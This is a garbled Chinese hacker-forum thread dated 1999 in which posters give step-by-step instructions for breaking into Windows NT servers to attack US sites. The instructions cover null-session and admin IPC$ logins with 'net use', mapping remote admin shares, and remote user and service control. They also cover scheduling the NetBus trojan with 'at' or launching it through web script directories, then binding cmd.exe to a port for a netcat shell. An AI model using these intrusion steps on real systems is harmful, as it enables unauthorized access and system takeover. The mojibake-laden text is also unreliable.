《版主頁黑客工具和文章的幾個問題》中提到:
# ^: J2 L& s. D, Z1 b2 g! z請教,從版主頁上載得PINGER�����,GRINDER���,LETMEIN等,卻不能用,PINGER安裝后����,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER��。EXE�����,40多K�����,運(yùn)行PINGER�����,設(shè)置好IP��,點PING�����,彈出一個窗口(C++�。�。��。)����,說出錯,然后關(guān)閉了����,何故,是不是安裝有誤����? 2。運(yùn)行LETMEIN���,彈出以下錯誤:連接文件LETMEIN�����。EXE到不存在的NETAPI32���。DLL���;NETGROUPGETUSERS�����。 是否說明需要NETAPI32��。DLL文件�,哪里有該DLL。 3����。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等��,是否要求我的操作系統(tǒng)也是WINNT4���。0 �����,應(yīng)該不是吧�����? 4����。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT��? 太多的問題需高手回答�,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦���, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章���,以提高我國黑客水平。" e2 p- w! ]: f$ e0 f
> 我的機(jī)子MMX166���,WIN98�����,2�。5G�,32M內(nèi)存。
$ s( z0 y W' O5 }( | G2 [* G) q2 d4 `; @( P; u! f
黑客并不神秘����,你只要了解操作系統(tǒng)����,學(xué)習(xí)一些操作系統(tǒng)的弱點���,輔助相關(guān)的工具,就可以成功��。" p! A8 d5 P+ X5 j- T( u
你的問題是���,pinger, grinder, letmein等工具必須要在NT上運(yùn)行�����,我們強(qiáng)烈建議����,你一定要安裝NT�����,對于你的機(jī)器配制�,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存���,2G硬盤��。
; W) G0 b5 C2 A. v) [% L& L其實���,攻擊敵站�����,利用其操作系統(tǒng)本身的工具就可以了�,比如�,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0��,我們將做如下簡單事情就有可能成功����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:6 L" N1 ]4 h9 F' `
net use \\111.111.111.111\ipc$ "" /user:""
& s: U. `/ Q2 I1 v1 ~$ Fnet.exe是NT的工具文件�����,該命令將和目標(biāo)服務(wù)器建立Null Session����,如果成功�,你可以查看該服務(wù)器上的共享目錄:3 U& N. F. r% O l( H1 m# ?
net view \\111.111.111.111
5 y/ v9 }* h, X3 r# E當(dāng)然���,如果你有該NT管理員密碼��,就更好辦了,假設(shè)其管理員Admin密碼為fuck:' j! Q2 ^9 N; I
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
! Z( X5 F9 y3 Y) S* A命令成功后����,幾乎所有目標(biāo)NT上的配制,資源�����,你都可以在你本地NT上連接遠(yuǎn)程計算機(jī)來查看或修改:
/ u( d6 r$ d# B2 q$ s1�����、查看或修改遠(yuǎn)程機(jī)器上的硬盤��,假如目標(biāo)NT上有C���、D兩個硬盤:
0 l$ U0 x- Y1 X+ ~1 X7 b+ r# ynet use x: \\111.111.111.111\c$
+ u5 i8 S) ]% O7 J$ rnet use y: \\111.111.111.111\d$
' d7 l- x# x$ y! V這樣�,目標(biāo)NT上的C、D盤分別被影射為你本地的X�、Y盤,你想怎么做都可以...
/ f1 O- ]+ a+ H2����、管理目標(biāo)NT的用戶:- `+ ~# |4 z6 y9 h* R) P4 C8 Z
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”5 z% }: q9 ~1 B6 @: V
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以�,和管理你本地的一樣6 X7 Z P! G& R9 a/ ~" f
3、管理目標(biāo)NT的服務(wù)
' I" r) s2 u, p$ g: w. {選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機(jī)”->“選擇域”( v$ A) _; F8 H, P
這樣你可以管理目標(biāo)NT上的服務(wù)�,共享目錄
1 s6 H, P, d* @9 ]% d4、IIS管理& m: C$ h8 i/ r% l
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111+ K1 E8 s3 B' Q$ m/ z
目標(biāo)NT的FTP�����、WWW服務(wù)你就可以重新配置: y6 _% s- f/ p
5����、事件管理0 K2 k2 z/ C9 T
“事件查看器”->連接到服務(wù)器->111.111.111.111
/ O6 I; c( k- p; x9 v5 V8 j7 b! ~/ Q( Z1 g+ x! h/ Z( Q- t
還有更多的東西,都可以用NT本身的功能來完成��,這些都是95, 98所不能實現(xiàn)的�����。7 d; i1 D( M# p! Z
% y6 g. `% k1 ^8 N1 q當(dāng)然�,98,95也能做一些事情��,但很麻煩���,比如:# C* W8 X \1 X. T
net use \\111.111.111.111\ipc$4 s( `+ [; T& F3 B h) K) Q3 `
net use z: \\111.111.111.111\d$" Q4 V; `+ G$ g$ v) ], E) |
但其后不能帶參數(shù),即改用其他用戶或密碼����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼��,重新啟動95, 98��,改用該用戶和密碼登錄�����,方可實現(xiàn)��,你可以連接目標(biāo)NT上的共享資源��,但不能進(jìn)行管理���,如用戶、事件等
* [* \1 c7 Y+ P5 U) ]& K; [5 l8 |/ h: I8 R
我們強(qiáng)烈建議各位有心要為死難者報仇�����,真正的想黑霉國的站點,花點時間���,裝個NT吧��,NT Workstation也可以�����!6 _; v0 j7 `0 e
這樣���,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用!
% T/ W! @; @4 \3 h1 D& Z+ e: z; j6 s
6 K4 H. z+ O; Z4 E' o: A
' s7 H. g4 n% h4 R0 h: p* ~ a--------------------------------------------------------------------------------+ b+ C1 Y) k3 U" n1 ~
% f2 T5 m# F) q! Z! ]9 K
>quack于1999-06-12����,23:37:446 F% K( a7 w/ b4 P) B- Q3 Z% F
在大作《幾個有關(guān)黑的問題》中提到:
9 Y& Y5 I8 a0 b2 s0 q首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時卻是在我的機(jī)上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
7 x. N d5 D9 d
8 s7 R4 y3 D' ^) X/ s$ Q" k. vkillusa于1999-06-13�����,03:25:15
7 X T7 [9 R, l, @6 g% d! ~在大作《Re: 幾個有關(guān)黑的問題》中提到:
7 E7 Q4 X5 \/ g/ U$ E
0 P5 O1 S6 B: K5 T: O9 Eletmein.exe 暫時沒有mypwd參數(shù)���,十分抱歉
, Q+ w: k( e4 P4 U+ B, kpinger程序�����,只是利用ping來尋找主機(jī)�,每臺NT服務(wù)器有一個主IP地址,但也可以設(shè)置多個輔助IP地址��,比如有些服務(wù)器供應(yīng)商��,一臺NT服務(wù)器上可以設(shè)置一千多個IP��,每個IP對應(yīng)一個Hostname,而真正能找到主機(jī)名的只有一個IP地址�����,就是該主機(jī)的主IP地址��,所以有時顯示只有IP�,而無主機(jī)名���。另外����,有些服務(wù)器是非NT的操作系統(tǒng)��,有時將不會顯示主機(jī)名。當(dāng)然�����,有時在服務(wù)器上進(jìn)行一些設(shè)置��,也會出現(xiàn)上面的情況���。' A5 M& ~# J8 O: B
" K% n" T8 z5 U% ]
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序�,所以�,netbus.exe是不用上傳的,只需在目的) k2 o3 X$ j8 u6 z
服務(wù)器上運(yùn)行ntsrv.exe��,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
! f- m, S m' o/ m8 z. S3 H$ O. o+ Q' ~- h9 x
1����、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運(yùn)行某程序,具體使用方法���,可在自己的NT Dos窗口下鍵入以下:) {4 d: _ c* | p- o
, S+ l y c; V6 O5 B; ]# NC:\>net start schedule& v9 \9 d1 U2 b+ { U/ E( T6 K
Schedule 正在啟動服務(wù).....- l8 Y* Q2 [& }5 Z, z& {+ _$ i
Schedulw 服務(wù)啟動成功��。" C9 R; x7 U/ u" z8 `
C:\>at /?9 k, ~ A! b) o
AT 命令排定在特定的日期和時間運(yùn)行某些命令和程序��。+ O$ ?2 f/ q" ~- Z' z
運(yùn)行 AT 命令之前必須先啟動 Schedule 服務(wù)���。
% p5 r1 d6 N6 B! i, ^( R7 G a+ I
2 G% X6 Y2 i5 n& p$ |! }AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]7 l- Y+ Z" X- ]9 i8 f
AT [\\computername] time [/INTERACTIVE]; F' c, m0 Y5 ~, D
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
& j" t7 I. l5 B/ o1 m
" b+ O! {/ ~$ }6 g: J5 A\\computername 指定遠(yuǎn)程計算機(jī)��。 如果省略這個參數(shù)) X' C9 C' ^4 V. \& j7 c! @
命令會被排定在本機(jī)上運(yùn)行�����。
3 b8 m/ i6 k5 x) ]" R9 n+ p/ uid 指定給排定進(jìn)度命令的識別號����。# x6 h* t5 h+ Z- b5 H0 _
, Z( W/ D/ V+ n! r% B
/delete 刪除某個已排定進(jìn)度的命令�。如果省略標(biāo)識,計算機(jī)上所有已排定進(jìn)度的命令都會被刪除�。2 }/ b8 o9 F2 O ?, k
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時顯示確認(rèn)信息 ���。
J2 n8 M$ G$ e; d: Qtime 指定命令運(yùn)行的時間����。 b) z/ p }0 W: Q" P' P
/interactive 允許作業(yè)在運(yùn)行時�����,與用戶通過桌面交互����。
# G8 m1 s" s: J5 A' c, \; C5 n
. f: y7 _: T! _6 a( R6 @2 N/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。7 A9 {4 A2 ^ O: r/ x8 u# G1 r
如果省略日期��,則默認(rèn)為在每月的本日運(yùn)行��。
5 k! h* H, n8 P
7 t( c8 J: j/ w# `1 S7 V4 `/next:date[,...] 指定在下一個指定日期 (如�����,下周三)�����,運(yùn)行命令��。如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行����。
: Y) o' P$ r; }3 x; V1 R+ ~4 o
7 ]1 H# }; M4 F6 t# G) M6 g"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�����。
' p/ ?: F- }) I4 B A" j( L8 s- u) N) _* X+ \, `0 ?
C:\>
" w1 _7 y2 T9 C9 B2 [* |5 U/ @! [1 Y4 f. e, c
知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:( L/ s0 j( Z1 }. J* \
1 利用管理員登陸到目的服務(wù)器���,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
2 r% @. }% M- t9 P' J. J2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
1 p3 i1 ^5 N1 l* b6 }3 M3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運(yùn)行��,當(dāng)然最快運(yùn)行最理想��,所以��,你可以用letmein.exe得到服務(wù)器的時間��,然后:! g2 B0 e) }% }$ F- a
at \\x.x.x.x 00:00 ntsrv.exe /port:643211 ?6 R! E0 \2 C* Y
其中00:00要改為用letmein.exe得回來的具體時間+一點容量�����,等一會后�,再在本地啟動netbus.exe���,鍵入目的服務(wù)器得ip地址或hostname�����,連接�!具體使用可參照 "How to get in nt"��,比如第一種方法��,你想要在目的服務(wù)器運(yùn)行 LEGION���,可以利用netbus得上傳功能���,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program"�,鍵入完整路徑的LEGION運(yùn)行程序,就ok了�!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù)��,如下:在netbus中擊“App redirect”����,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321����,服務(wù)就啟動了,然后在本地運(yùn)行:nc x.x.x.x 4321�,出現(xiàn)dos啟動的畫面就表示連接成功:- ]3 N. Y$ t" j, F; T# d
Microsoft(R) Windows NT(TM)# ]3 t1 |! e6 l2 a0 l
(C) Copyright 1985-1996 Microsoft Corp.% Q7 e. r) \# l, m i( ?3 p7 L
C:\>
7 x/ U% m: C( n, {' `3 j8 s. k- |6 q9 A
2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
* ?% q* y p9 v
, I8 d2 ]5 b2 v: X8 y. J& Z8 W將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts�����,然后在瀏覽器鍵入url如:. H& p+ g( k9 D' X. Y$ u
http://x.x.x.x/scripts/ntsrv.exe /port:64321
6 v. f# \! V' o T3 ^或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:643215 D+ x* x! u; Y0 d) c0 m/ k
該程序就啟動了
6 f" H1 D( _; Q
4 }- e# S V2 f- p1 u+ O我只提這幾中方法��!0 x6 b& T$ a0 I# U3 e7 \, j
要成功�����,必須打好基礎(chǔ)工�����,對操作系統(tǒng)充分了解!
5 x5 \/ p; R( m* I- v \ L5 Q$ S2 H7 k) Y& ]9 k. S
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡